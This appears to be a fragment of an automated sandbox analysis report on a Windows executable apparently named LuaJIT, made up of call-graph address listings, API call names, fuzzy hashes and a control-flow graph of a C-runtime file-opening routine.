76796->76838 76878 7ff7b1deaca0 15 API calls 2 library calls 76797->76878 76799 7ff7b1de2ed0 76800 7ff7b1de2cb0 76801 7ff7b1de273d 76800->76801 76804 7ff7b1de2dd7 76800->76804 76806 7ff7b1de3098 76800->76806 76807 7ff7b1de2d98 76800->76807 76801->76801 76801->76806 76879 7ff7b1de2420 17 API calls 2 library calls 76801->76879 76880 7ff7b1deaca0 15 API calls 2 library calls 76801->76880 76802 7ff7b1de4978 76882 7ff7b1e370e0 17 API calls 76802->76882 76805 7ff7b1de5066 76806->76802 76810 7ff7b1de4941 76806->76810 76881 7ff7b1deaca0 15 API calls 2 library calls 76806->76881 76807->76804 76877 7ff7b1deaca0 15 API calls 2 library calls 76807->76877 76818 7ff7b1e2f913 __ExceptionPtrDestroy 76817->76818 76883 7ff7b1e2edf0 76818->76883 76822 7ff7b1e2f94f __ExceptionPtrDestroy 76823 7ff7b1e2f97f 76822->76823 76824 7ff7b1e2fa1b 76822->76824 76897 7ff7b1e02250 15 API calls 2 library calls 76822->76897 76823->76800 76899 7ff7b1e2f5c0 96 API calls 4 library calls 76824->76899 76827 7ff7b1e2fa05 76898 7ff7b1df0fa0 15 API calls std::rsfun 76827->76898 76830 7ff7b1e30377 76829->76830 76831 7ff7b1e30327 76829->76831 76830->76800 76831->76830 76935 7ff7b1e6ee10 76831->76935 76944 7ff7b1e35910 76833->76944 76835 7ff7b1e31768 76951 7ff7b1e6eda0 76835->76951 76839 7ff7b1de698b 76838->76839 76840 7ff7b1de69a5 76839->76840 76841 7ff7b1de69bd 76839->76841 77025 7ff7b1de51e0 59 API calls _wcsupr_s 76840->77025 76843 7ff7b1de69ed 76841->76843 77026 7ff7b1decb50 15 API calls _free_nolock 76841->77026 76971 7ff7b1df8020 76843->76971 76845 7ff7b1de69d7 77027 7ff7b1ded5e0 76845->77027 76848 7ff7b1de6a06 76984 7ff7b1de5690 76848->76984 76851 7ff7b1de6a4d 76853 7ff7b1de6a77 76851->76853 76864 7ff7b1de69aa 76851->76864 77036 7ff7b1de5500 57 API calls _wcsupr_s 76851->77036 76992 7ff7b1de66b0 76853->76992 76857 7ff7b1de6ace 76858 7ff7b1de6af0 76857->76858 76862 7ff7b1de6b06 _wcsupr_s 76857->76862 76857->76864 77037 7ff7b1de5530 72 API calls 2 library calls 76858->77037 76861 7ff7b1de6afa 77038 7ff7b1de5c10 98 API calls 2 library calls 76861->77038 76862->76864 77039 7ff7b1eaa1fc 76862->77039 76864->76800 76869 7ff7b1de6b54 77056 7ff7b1de5740 117 API calls _wcsupr_s 76869->77056 76870 7ff7b1de6b39 77053 7ff7b1de5500 57 API calls _wcsupr_s 76870->77053 76873 7ff7b1de6b3e 77054 7ff7b1de5530 72 API calls 2 library calls 76873->77054 76875 7ff7b1de6b48 77055 7ff7b1de5c10 98 API calls 2 library calls 76875->77055 76877->76807 76878->76799 76880->76801 76881->76806 76882->76805 76884 7ff7b1e2ee25 76883->76884 76885 7ff7b1e2ee4a 76884->76885 76900 7ff7b1df1310 15 API calls __ExceptionPtrDestroy 76884->76900 76885->76822 76887 7ff7b1e6dc40 76885->76887 76888 7ff7b1e6dc70 76887->76888 76896 7ff7b1e6ddcc _handle_error _mbsncpy_s 76888->76896 76901 7ff7b1e6de50 76888->76901 76890 7ff7b1e6dd15 76922 7ff7b1de5074 76890->76922 76892 7ff7b1e6dd4a 76893 7ff7b1e6dd81 76892->76893 76925 7ff7b1dfd720 15 API calls 3 library calls 76892->76925 76926 7ff7b1e6e6e0 15 API calls memcpy_s 76893->76926 76896->76822 76897->76827 76898->76824 76899->76823 76900->76885 76902 7ff7b1e6debb __scrt_get_show_window_mode 76901->76902 76908 7ff7b1e6df15 76902->76908 76927 7ff7b1e6da60 15 API calls wcsxfrm 76902->76927 76905 7ff7b1e6e391 76933 7ff7b1e60960 17 API calls memcpy_s 76905->76933 76906 7ff7b1e6e64c 76910 7ff7b1e6e665 76906->76910 76934 7ff7b1df1010 15 API calls std::rsfun 76906->76934 76907 7ff7b1e6e18f 76911 7ff7b1e6e212 76907->76911 76916 7ff7b1e6e1af 76907->76916 76928 7ff7b1df1010 15 API calls std::rsfun 76907->76928 76908->76906 76908->76907 76919 7ff7b1e6df1c 76908->76919 76910->76890 76929 7ff7b1e6dac0 15 API calls 76911->76929 76915 7ff7b1e6e513 76915->76890 76917 7ff7b1e6e30d 76916->76917 76916->76919 76920 7ff7b1e6e2c8 76916->76920 76917->76919 76931 7ff7b1e6da60 15 API calls wcsxfrm 76917->76931 76919->76905 76932 7ff7b1df1010 15 API calls std::rsfun 76919->76932 76920->76919 76930 7ff7b1e6da60 15 API calls wcsxfrm 76920->76930 76923 7ff7b1de508b CreateMutexW 76922->76923 76923->76892 76925->76893 76926->76896 76927->76908 76928->76911 76929->76916 76930->76919 76931->76919 76932->76905 76933->76915 76934->76910 76938 7ff7b1e6f080 76935->76938 76939 7ff7b1e6f0ed 76938->76939 76943 7ff7b1e6f094 76938->76943 76940 7ff7b1e6f0f8 FreeLibrary 76939->76940 76941 7ff7b1e6ee23 76939->76941 76940->76941 76941->76830 76942 7ff7b1e6f0cb FreeLibrary 76942->76943 76943->76941 76943->76942 76945 7ff7b1e359af 76944->76945 76946 7ff7b1e35945 76944->76946 76957 7ff7b1df1310 15 API calls __ExceptionPtrDestroy 76945->76957 76946->76945 76948 7ff7b1e35956 __ExceptionPtrDestroy 76946->76948 76949 7ff7b1e35980 76946->76949 76948->76835 76956 7ff7b1e12a30 15 API calls type_info::_name_internal_method 76949->76956 76958 7ff7b1e6f000 GetLastError 76951->76958 76953 7ff7b1e6edd3 76964 7ff7b1e6f340 15 API calls 2 library calls 76953->76964 76955 7ff7b1e317e7 76955->76800 76956->76948 76957->76948 76965 7ff7b1e6efa0 76958->76965 76961 7ff7b1e6f05d SetLastError 76961->76953 76962 7ff7b1e6f047 76969 7ff7b1e6ee80 25 API calls 2 library calls 76962->76969 76964->76955 76966 7ff7b1e6efb8 76965->76966 76967 7ff7b1e6efd2 LoadLibraryExA 76966->76967 76970 7ff7b1e13010 15 API calls std::rsfun 76966->76970 76967->76961 76967->76962 76969->76961 76970->76967 76983 7ff7b1df8037 76971->76983 76972 7ff7b1df808d 77057 7ff7b1df4b70 76972->77057 76976 7ff7b1df8100 76978 7ff7b1deb4e0 wcsxfrm 15 API calls 76976->76978 76977 7ff7b1deca10 task 15 API calls 76980 7ff7b1df80a9 76977->76980 76981 7ff7b1df810f 76978->76981 76980->76976 76980->76977 76982 7ff7b1ded5e0 wcsxfrm 15 API calls 76980->76982 76981->76848 76982->76980 76983->76972 77068 7ff7b1deca10 76983->77068 77074 7ff7b1dec860 15 API calls 3 library calls 76983->77074 77075 7ff7b1dedce0 15 API calls strrchr 76983->77075 76985 7ff7b1ded0c0 wcsxfrm 15 API calls 76984->76985 76986 7ff7b1de56c5 76985->76986 76987 7ff7b1de571b 76986->76987 77115 7ff7b1dec860 15 API calls 3 library calls 76986->77115 77116 7ff7b1ded7d0 15 API calls 2 library calls 76986->77116 76989 7ff7b1ded5e0 wcsxfrm 15 API calls 76987->76989 76990 7ff7b1de5731 76989->76990 76990->76851 77035 7ff7b1de68d0 117 API calls 76990->77035 76993 7ff7b1de66cd 76992->76993 76994 7ff7b1de6872 76993->76994 76995 7ff7b1de6722 76993->76995 77002 7ff7b1de6746 76993->77002 77120 7ff7b1de6230 75 API calls wcsxfrm 76994->77120 76996 7ff7b1de689e 76995->76996 76997 7ff7b1de672d 76995->76997 77121 7ff7b1de62c0 75 API calls 2 library calls 76996->77121 77000 7ff7b1de6734 76997->77000 77001 7ff7b1de674b 76997->77001 77003 7ff7b1de6816 77000->77003 77004 7ff7b1de673f 77000->77004 77117 7ff7b1de57b0 98 API calls 2 library calls 77001->77117 77002->76857 77002->76864 77008 7ff7b1de5d60 77002->77008 77119 7ff7b1de60e0 75 API calls 3 library calls 77003->77119 77004->77002 77118 7ff7b1de5840 77 API calls 2 library calls 77004->77118 77010 7ff7b1de5d96 77008->77010 77122 7ff7b1df3f90 77010->77122 77012 7ff7b1de5e96 77014 7ff7b1de5300 75 API calls 77012->77014 77016 7ff7b1de5ea8 77014->77016 77015 7ff7b1de5e01 wcsxfrm 77017 7ff7b1de5e76 77015->77017 77018 7ff7b1de5e15 wcsxfrm 77015->77018 77016->76857 77019 7ff7b1deb4e0 wcsxfrm 15 API calls 77017->77019 77022 7ff7b1de5e49 77018->77022 77145 7ff7b1decfa0 15 API calls 3 library calls 77018->77145 77024 7ff7b1de5e58 wcsxfrm 77019->77024 77023 7ff7b1deb4e0 wcsxfrm 15 API calls 77022->77023 77023->77024 77135 7ff7b1de5430 77024->77135 77025->76864 77026->76845 77028 7ff7b1ded600 wcsxfrm _free_nolock 77027->77028 77029 7ff7b1dfb7a0 type_info::_name_internal_method 15 API calls 77028->77029 77030 7ff7b1ded621 _free_nolock 77029->77030 77031 7ff7b1dff8b0 wcsxfrm 15 API calls 77030->77031 77032 7ff7b1ded647 task 77031->77032 77034 7ff7b1ded654 task 77032->77034 77397 7ff7b1de2420 15 API calls strrchr 77032->77397 77034->76843 77035->76851 77036->76853 77037->76861 77038->76864 77040 7ff7b1eaa205 77039->77040 77041 7ff7b1de6b2e 77039->77041 77042 7ff7b1eaaef8 _set_fmode 14 API calls 77040->77042 77045 7ff7b1eaa548 77041->77045 77043 7ff7b1eaa20a 77042->77043 77398 7ff7b1eb8b14 23 API calls _invalid_parameter_noinfo 77043->77398 77046 7ff7b1eaa551 77045->77046 77047 7ff7b1eaa55e 77045->77047 77048 7ff7b1eaaef8 _set_fmode 14 API calls 77046->77048 77049 7ff7b1de6b35 77047->77049 77050 7ff7b1eaaef8 _set_fmode 14 API calls 77047->77050 77048->77049 77049->76869 77049->76870 77051 7ff7b1eaa595 77050->77051 77399 7ff7b1eb8b14 23 API calls _invalid_parameter_noinfo 77051->77399 77053->76873 77054->76875 77055->76864 77056->76864 77076 7ff7b1deb5f0 77057->77076 77059 7ff7b1deb4e0 wcsxfrm 15 API calls 77066 7ff7b1df4b95 wcsxfrm __ExceptionPtrDestroy _free_nolock 77059->77066 77060 7ff7b1df4ca8 77061 7ff7b1deb4e0 wcsxfrm 15 API calls 77060->77061 77062 7ff7b1df4cb7 77061->77062 77062->76980 77064 7ff7b1dec7a0 15 API calls wcsxfrm 77064->77066 77065 7ff7b1deb5f0 wcsxfrm 15 API calls 77065->77066 77066->77059 77066->77060 77066->77062 77066->77064 77066->77065 77080 7ff7b1ded0c0 77066->77080 77086 7ff7b1ded4e0 15 API calls 3 library calls 77066->77086 77069 7ff7b1deca3f task _mbsncpy_s 77068->77069 77111 7ff7b1dfea50 77069->77111 77071 7ff7b1deca64 task 77072 7ff7b1decb36 77071->77072 77114 7ff7b1dead60 15 API calls _free_nolock 77071->77114 77072->76983 77074->76983 77075->76983 77077 7ff7b1deb60b wcsxfrm task 77076->77077 77078 7ff7b1deb65b 77077->77078 77087 7ff7b1dead60 15 API calls _free_nolock 77077->77087 77078->77066 77081 7ff7b1ded0ee _mbsncpy_s 77080->77081 77088 7ff7b1dfc600 77081->77088 77083 7ff7b1ded10b wcsxfrm 77084 7ff7b1ded15b 77083->77084 77092 7ff7b1dead60 15 API calls _free_nolock 77083->77092 77084->77066 77086->77066 77087->77078 77089 7ff7b1dfc619 wcsxfrm 77088->77089 77093 7ff7b1dfc5a0 77089->77093 77091 7ff7b1dfc67d 77091->77083 77092->77084 77096 7ff7b1dfdff0 77093->77096 77095 7ff7b1dfc5c5 wcsxfrm 77095->77091 77097 7ff7b1dfe00d 77096->77097 77098 7ff7b1dfe0cc 77096->77098 77097->77098 77100 7ff7b1dfe023 77097->77100 77099 7ff7b1df8da0 wcsxfrm 15 API calls 77098->77099 77101 7ff7b1dfe0db 77099->77101 77102 7ff7b1df8da0 wcsxfrm 15 API calls 77100->77102 77103 7ff7b1dfe17d 77101->77103 77104 7ff7b1dfe03c 77101->77104 77109 7ff7b1df0950 15 API calls strrchr 77101->77109 77102->77104 77107 7ff7b1df8d00 _free_nolock 15 API calls 77103->77107 77105 7ff7b1dfe1c7 77104->77105 77110 7ff7b1dfde50 15 API calls 2 library calls 77104->77110 77105->77095 77107->77104 77109->77103 77110->77105 77112 7ff7b1df8da0 wcsxfrm 15 API calls 77111->77112 77113 7ff7b1dfea7b 77112->77113 77113->77071 77114->77072 77115->76986 77116->76986 77117->77002 77118->77002 77119->77002 77120->77002 77121->77002 77146 7ff7b1df4050 77122->77146 77124 7ff7b1de5dd4 77124->77012 77125 7ff7b1decde0 77124->77125 77126 7ff7b1dece00 wcsxfrm _free_nolock 77125->77126 77127 7ff7b1dfb7a0 type_info::_name_internal_method 15 API calls 77126->77127 77128 7ff7b1dece21 _free_nolock 77127->77128 77363 7ff7b1dff6e0 77128->77363 77130 7ff7b1dece47 77133 7ff7b1dece8a task 77130->77133 77370 7ff7b1de2420 15 API calls strrchr 77130->77370 77132 7ff7b1decf04 77132->77015 77133->77132 77371 7ff7b1dead60 15 API calls _free_nolock 77133->77371 77136 7ff7b1de544c 77135->77136 77137 7ff7b1deca10 task 15 API calls 77136->77137 77138 7ff7b1de5468 wcsxfrm 77137->77138 77374 7ff7b1eaa97c 77138->77374 77143 7ff7b1eaa97c 17 API calls 77144 7ff7b1de54c8 wcsxfrm 77143->77144 77144->77012 77145->77018 77147 7ff7b1df4083 77146->77147 77150 7ff7b1df40f5 _wcsupr_s 77146->77150 77174 7ff7b1eab114 77147->77174 77193 7ff7b1df3e80 77150->77193 77151 7ff7b1df40a4 77155 7ff7b1eaaef8 _set_fmode 14 API calls 77151->77155 77152 7ff7b1df40d9 77219 7ff7b1dec990 15 API calls 2 library calls 77152->77219 77157 7ff7b1df40a9 77155->77157 77156 7ff7b1df413f 77199 7ff7b1eab02c 77156->77199 77217 7ff7b1eab448 23 API calls 4 library calls 77157->77217 77161 7ff7b1df40b0 77218 7ff7b1dec990 15 API calls 2 library calls 77161->77218 77162 7ff7b1df4155 77165 7ff7b1eaaef8 _set_fmode 14 API calls 77162->77165 77164 7ff7b1df41e3 _wcsupr_s 77168 7ff7b1df40cf _handle_error 77164->77168 77205 7ff7b1eaaf9c 77164->77205 77167 7ff7b1df419e 77165->77167 77220 7ff7b1eab448 23 API calls 4 library calls 77167->77220 77168->77124 77170 7ff7b1df41a5 77221 7ff7b1dec990 15 API calls 2 library calls 77170->77221 77172 7ff7b1df41c7 77172->77168 77173 7ff7b1eaaf9c _wcsupr_s 57 API calls 77172->77173 77173->77168 77175 7ff7b1eab058 77174->77175 77176 7ff7b1eab075 77175->77176 77179 7ff7b1eab0a1 77175->77179 77177 7ff7b1eaaef8 _set_fmode 14 API calls 77176->77177 77178 7ff7b1eab07a 77177->77178 77234 7ff7b1eb8b14 23 API calls _invalid_parameter_noinfo 77178->77234 77181 7ff7b1eab0a6 77179->77181 77182 7ff7b1eab0b3 77179->77182 77183 7ff7b1eaaef8 _set_fmode 14 API calls 77181->77183 77222 7ff7b1ebd698 77182->77222 77185 7ff7b1df4097 77183->77185 77185->77151 77185->77152 77187 7ff7b1eab0d4 77229 7ff7b1ebdabc 77187->77229 77188 7ff7b1eab0c7 77190 7ff7b1eaaef8 _set_fmode 14 API calls 77188->77190 77190->77185 77191 7ff7b1eab0e8 _wcsupr_s 77235 7ff7b1e91c84 LeaveCriticalSection 77191->77235 77194 7ff7b1df3ec6 _mbsncpy_s 77193->77194 77195 7ff7b1de3037 _mbsncpy_s 94 API calls 77194->77195 77196 7ff7b1df3f2b 77195->77196 77347 7ff7b1e073c0 77196->77347 77198 7ff7b1df3f41 _mbsncpy_s 77198->77156 77200 7ff7b1eab035 77199->77200 77201 7ff7b1df414d 77199->77201 77202 7ff7b1eaaef8 _set_fmode 14 API calls 77200->77202 77201->77162 77201->77164 77203 7ff7b1eab03a 77202->77203 77360 7ff7b1eb8b14 23 API calls _invalid_parameter_noinfo 77203->77360 77206 7ff7b1eaafd1 77205->77206 77207 7ff7b1eaafb3 77205->77207 77214 7ff7b1eaafc3 _wcsupr_s 77206->77214 77361 7ff7b1e91c78 EnterCriticalSection 77206->77361 77208 7ff7b1eaaef8 _set_fmode 14 API calls 77207->77208 77209 7ff7b1eaafb8 77208->77209 77362 7ff7b1eb8b14 23 API calls _invalid_parameter_noinfo 77209->77362 77212 7ff7b1eaafe7 77213 7ff7b1eaaf18 _wcsupr_s 55 API calls 77212->77213 77215 7ff7b1eaaff0 77213->77215 77214->77168 77216 7ff7b1e91c84 _fread_nolock LeaveCriticalSection 77215->77216 77216->77214 77217->77161 77218->77168 77219->77150 77220->77170 77221->77172 77236 7ff7b1eb91ac EnterCriticalSection 77222->77236 77224 7ff7b1ebd6af 77225 7ff7b1ebd70c tmpfile 17 API calls 77224->77225 77226 7ff7b1ebd6ba 77225->77226 77227 7ff7b1eb9200 _isindst LeaveCriticalSection 77226->77227 77228 7ff7b1eab0bd 77227->77228 77228->77187 77228->77188 77237 7ff7b1ebd7f8 77229->77237 77232 7ff7b1ebdb16 77232->77191 77234->77185 77238 7ff7b1ebd822 _wcsupr_s 77237->77238 77247 7ff7b1ebd9d5 77238->77247 77252 7ff7b1ecb0e4 26 API calls 3 library calls 77238->77252 77239 7ff7b1eaaef8 _set_fmode 14 API calls 77240 7ff7b1ebda9b 77239->77240 77255 7ff7b1eb8b14 23 API calls _invalid_parameter_noinfo 77240->77255 77242 7ff7b1ebd9de 77242->77232 77249 7ff7b1ec1dd8 77242->77249 77244 7ff7b1ebda36 77244->77247 77253 7ff7b1ecb0e4 26 API calls 3 library calls 77244->77253 77246 7ff7b1ebda57 77246->77247 77254 7ff7b1ecb0e4 26 API calls 3 library calls 77246->77254 77247->77239 77247->77242 77256 7ff7b1ec1698 77249->77256 77252->77244 77253->77246 77254->77247 77255->77242 77257 7ff7b1ec16af 77256->77257 77259 7ff7b1ec16cd 77256->77259 77258 7ff7b1eaaef8 _set_fmode 14 API calls 77257->77258 77260 7ff7b1ec16b4 77258->77260 77259->77257 77261 7ff7b1ec16e9 77259->77261 77278 7ff7b1eb8b14 23 API calls _invalid_parameter_noinfo 77260->77278 77267 7ff7b1ec1cc0 77261->77267 77265 7ff7b1ec16c0 77265->77232 77268 7ff7b1e93ea8 wcsftime 26 API calls 77267->77268 77269 7ff7b1ec1d13 77268->77269 77272 7ff7b1ec1d23 77269->77272 77345 7ff7b1eb95a0 5 API calls try_get_function 77269->77345 77280 7ff7b1eb4f28 77272->77280 77274 7ff7b1ec1d7b 77276 7ff7b1ec1714 77274->77276 77346 7ff7b1eb9294 14 API calls 2 library calls 77274->77346 77276->77265 77279 7ff7b1ec7978 LeaveCriticalSection 77276->77279 77278->77265 77281 7ff7b1eb4f51 77280->77281 77282 7ff7b1eb4f73 77280->77282 77284 7ff7b1eb9294 __free_lconv_num 14 API calls 77281->77284 77286 7ff7b1eb4f5f 77281->77286 77283 7ff7b1eb4fcc 77282->77283 77287 7ff7b1eb4f77 77282->77287 77285 7ff7b1ec2ff4 wcsftime MultiByteToWideChar 77283->77285 77284->77286 77296 7ff7b1eb4fe7 77285->77296 77286->77274 77302 7ff7b1ec1e0c 77286->77302 77287->77286 77288 7ff7b1eb4f8b 77287->77288 77290 7ff7b1eb9294 __free_lconv_num 14 API calls 77287->77290 77291 7ff7b1eba290 wcsftime 15 API calls 77288->77291 77289 7ff7b1eb4fee GetLastError 77292 7ff7b1eaae88 wcsftime 14 API calls 77289->77292 77290->77288 77291->77286 77295 7ff7b1eb4ffb 77292->77295 77293 7ff7b1eb5027 77293->77286 77294 7ff7b1ec2ff4 wcsftime MultiByteToWideChar 77293->77294 77299 7ff7b1eb506f 77294->77299 77300 7ff7b1eaaef8 _set_fmode 14 API calls 77295->77300 77296->77289 77296->77293 77297 7ff7b1eb501b 77296->77297 77301 7ff7b1eb9294 __free_lconv_num 14 API calls 77296->77301 77298 7ff7b1eba290 wcsftime 15 API calls 77297->77298 77298->77293 77299->77286 77299->77289 77300->77286 77301->77297 77303 7ff7b1ec19f0 tmpfile 23 API calls 77302->77303 77304 7ff7b1ec1e53 77303->77304 77305 7ff7b1ec1e81 77304->77305 77306 7ff7b1ec1e99 77304->77306 77307 7ff7b1eaaed8 tmpfile 14 API calls 77305->77307 77308 7ff7b1ec79a0 tmpfile 18 API calls 77306->77308 77323 7ff7b1ec1e86 77307->77323 77309 7ff7b1ec1e9e 77308->77309 77310 7ff7b1ec1ea5 77309->77310 77311 7ff7b1ec1ebe CreateFileW 77309->77311 77315 7ff7b1eaaed8 tmpfile 14 API calls 77310->77315 77312 7ff7b1ec1fa4 GetFileType 77311->77312 77313 7ff7b1ec1f29 77311->77313 77317 7ff7b1ec1fb1 GetLastError 77312->77317 77324 7ff7b1ec2002 77312->77324 77316 7ff7b1ec1f71 GetLastError 77313->77316 77319 7ff7b1ec1f37 CreateFileW 77313->77319 77314 7ff7b1eaaef8 _set_fmode 14 API calls 77338 7ff7b1ec1e92 77314->77338 77318 7ff7b1ec1eaa 77315->77318 77320 7ff7b1eaae88 wcsftime 14 API calls 77316->77320 77321 7ff7b1eaae88 wcsftime 14 API calls 77317->77321 77322 7ff7b1eaaef8 _set_fmode 14 API calls 77318->77322 77319->77312 77319->77316 77320->77323 77325 7ff7b1ec1fc0 CloseHandle 77321->77325 77322->77323 77323->77314 77326 7ff7b1ec78b8 tmpfile 15 API calls 77324->77326 77325->77323 77327 7ff7b1ec1ff2 77325->77327 77328 7ff7b1ec2024 77326->77328 77329 7ff7b1eaaef8 _set_fmode 14 API calls 77327->77329 77330 7ff7b1ec2074 77328->77330 77332 7ff7b1ec1bfc tmpfile 62 API calls 77328->77332 77331 7ff7b1ec1ff7 77329->77331 77333 7ff7b1ec175c tmpfile 62 API calls 77330->77333 77335 7ff7b1ec207b 77330->77335 77331->77323 77332->77330 77334 7ff7b1ec20b2 77333->77334 77334->77335 77336 7ff7b1ec20bc 77334->77336 77337 7ff7b1ebd5d8 tmpfile 26 API calls 77335->77337 77336->77338 77339 7ff7b1ec213c CloseHandle CreateFileW 77336->77339 77337->77338 77338->77274 77340 7ff7b1ec21b1 77339->77340 77341 7ff7b1ec2183 GetLastError 77339->77341 77340->77338 77342 7ff7b1eaae88 wcsftime 14 API calls 77341->77342 77343 7ff7b1ec2190 77342->77343 77344 7ff7b1ec7ae0 tmpfile 15 API calls 77343->77344 77344->77340 77345->77272 77346->77276 77354 7ff7b1e06f90 77347->77354 77350 7ff7b1e06f90 _mbsncpy_s 10 API calls 77351 7ff7b1e0742c 77350->77351 77357 7ff7b1e07010 77351->77357 77356 7ff7b1e08b40 10 API calls 77354->77356 77355 7ff7b1e06fda 77355->77350 77356->77355 77358 7ff7b1e06f90 _mbsncpy_s 10 API calls 77357->77358 77359 7ff7b1e0704b 77358->77359 77359->77198 77360->77201 77362->77214 77365 7ff7b1dff707 wcsxfrm 77363->77365 77366 7ff7b1dff81e 77365->77366 77369 7ff7b1dff727 wcsxfrm 77365->77369 77372 7ff7b1df0a70 15 API calls 2 library calls 77366->77372 77368 7ff7b1dff7f0 wcsxfrm 77368->77130 77369->77368 77373 7ff7b1df0950 15 API calls strrchr 77369->77373 77371->77132 77372->77368 77373->77368 77375 7ff7b1eaa9a4 77374->77375 77386 7ff7b1eaaa57 memcpy_s 77374->77386 77376 7ff7b1eaaa67 77375->77376 77378 7ff7b1eaa9bb 77375->77378 77382 7ff7b1ebab1c _set_fmode 14 API calls 77376->77382 77376->77386 77377 7ff7b1eaaef8 _set_fmode 14 API calls 77379 7ff7b1de5487 77377->77379 77396 7ff7b1eb91ac EnterCriticalSection 77378->77396 77392 7ff7b1dedd30 77379->77392 77383 7ff7b1eaaa83 77382->77383 77383->77386 77388 7ff7b1eba290 wcsftime 15 API calls 77383->77388 77386->77377 77386->77379 77388->77386 77393 7ff7b1dedd6f wcsxfrm 77392->77393 77394 7ff7b1de2f8a 15 API calls 77393->77394 77395 7ff7b1de54b8 77394->77395 77395->77143 77398->77041 77399->77049 77400 7ff7b1de4a97 77401 7ff7b1de4aa7 77400->77401 77404 7ff7b1df30a0 77401->77404 77403 7ff7b1de4ac4 77405 7ff7b1eaaef8 _set_fmode 14 API calls 77404->77405 77406 7ff7b1df30b3 GetLastError 77405->77406 77418 7ff7b1df3ca0 77406->77418 77409 7ff7b1df3156 77412 7ff7b1e03fc0 94 API calls 77409->77412 77413 7ff7b1df318d 77409->77413 77410 7ff7b1df3132 77424 7ff7b1e040a0 96 API calls _set_fmode 77410->77424 77412->77413 77417 7ff7b1df314f 77413->77417 77425 7ff7b1df3a80 19 API calls _handle_error 77413->77425 77414 7ff7b1eaaef8 _set_fmode 14 API calls 77416 7ff7b1df3294 SetLastError 77414->77416 77416->77403 77417->77414 77419 7ff7b1df3cbf 77418->77419 77420 7ff7b1df3d67 77418->77420 77426 7ff7b1df2320 15 API calls _free_nolock 77419->77426 77427 7ff7b1df2320 15 API calls _free_nolock 77420->77427 77423 7ff7b1df310f 77423->77409 77423->77410 77424->77417 77425->77417 77426->77423 77427->77423 77428 7ff7b1de4a47 77429 7ff7b1de4a30 77428->77429 77431 7ff7b1e040a0 96 API calls _set_fmode 77429->77431 77431->77429

                                                      Executed Functions

                                                      Function 00007FF7B1E8D4C8 Relevance: 3.0, APIs: 2, Instructions: 18COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled_invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 59578552-0
                                                      • Opcode ID: d7a9869b5436ec8d6cd8c1598a24097234ef9bd1e157571d7b699d03ddd951d2
                                                      • Instruction ID: 096e6e6c7bed89bf0e430d5a58f546af2901d262870833d79d78cf06b16626e0
                                                      • Opcode Fuzzy Hash: d7a9869b5436ec8d6cd8c1598a24097234ef9bd1e157571d7b699d03ddd951d2
                                                      • Instruction Fuzzy Hash: 9BE04620E1C54381F758B66E28860BD90806F6B72AFE00335F32E81BCACDDC21928632
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1EC1E0C Relevance: 13.8, APIs: 9, Instructions: 273fileCOMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 7ff7b1ec1e0c-7ff7b1ec1e7f call 7ff7b1ec19f0 3 7ff7b1ec1e81-7ff7b1ec1e8a call 7ff7b1eaaed8 0->3 4 7ff7b1ec1e99-7ff7b1ec1ea3 call 7ff7b1ec79a0 0->4 9 7ff7b1ec1e8d-7ff7b1ec1e94 call 7ff7b1eaaef8 3->9 10 7ff7b1ec1ea5-7ff7b1ec1ebc call 7ff7b1eaaed8 call 7ff7b1eaaef8 4->10 11 7ff7b1ec1ebe-7ff7b1ec1f27 CreateFileW 4->11 26 7ff7b1ec21d2-7ff7b1ec21f2 9->26 10->9 12 7ff7b1ec1fa4-7ff7b1ec1faf GetFileType 11->12 13 7ff7b1ec1f29-7ff7b1ec1f2f 11->13 19 7ff7b1ec2002-7ff7b1ec2009 12->19 20 7ff7b1ec1fb1-7ff7b1ec1fec GetLastError call 7ff7b1eaae88 CloseHandle 12->20 16 7ff7b1ec1f71-7ff7b1ec1f9f GetLastError call 7ff7b1eaae88 13->16 17 7ff7b1ec1f31-7ff7b1ec1f35 13->17 16->9 17->16 24 7ff7b1ec1f37-7ff7b1ec1f6f CreateFileW 17->24 22 7ff7b1ec2011-7ff7b1ec2014 19->22 23 7ff7b1ec200b-7ff7b1ec200f 19->23 20->9 35 7ff7b1ec1ff2-7ff7b1ec1ffd call 7ff7b1eaaef8 20->35 30 7ff7b1ec201a-7ff7b1ec206b call 7ff7b1ec78b8 22->30 31 7ff7b1ec2016 22->31 23->30 24->12 24->16 38 7ff7b1ec208a-7ff7b1ec20ba call 7ff7b1ec175c 30->38 39 7ff7b1ec206d-7ff7b1ec2079 call 7ff7b1ec1bfc 30->39 31->30 35->9 45 7ff7b1ec207d-7ff7b1ec2085 call 7ff7b1ebd5d8 38->45 46 7ff7b1ec20bc-7ff7b1ec20ff 38->46 39->38 47 7ff7b1ec207b 39->47 45->26 48 7ff7b1ec2121-7ff7b1ec212c 46->48 49 7ff7b1ec2101-7ff7b1ec2105 46->49 47->45 52 7ff7b1ec2132-7ff7b1ec2136 48->52 53 7ff7b1ec21d0 48->53 49->48 51 7ff7b1ec2107-7ff7b1ec211c 49->51 51->48 52->53 55 7ff7b1ec213c-7ff7b1ec2181 CloseHandle CreateFileW 52->55 53->26 56 7ff7b1ec21b6-7ff7b1ec21cb 55->56 57 7ff7b1ec2183-7ff7b1ec21b1 GetLastError call 7ff7b1eaae88 call 7ff7b1ec7ae0 55->57 56->53 57->56
                                                      APIs
                                                      Memory Dump Source
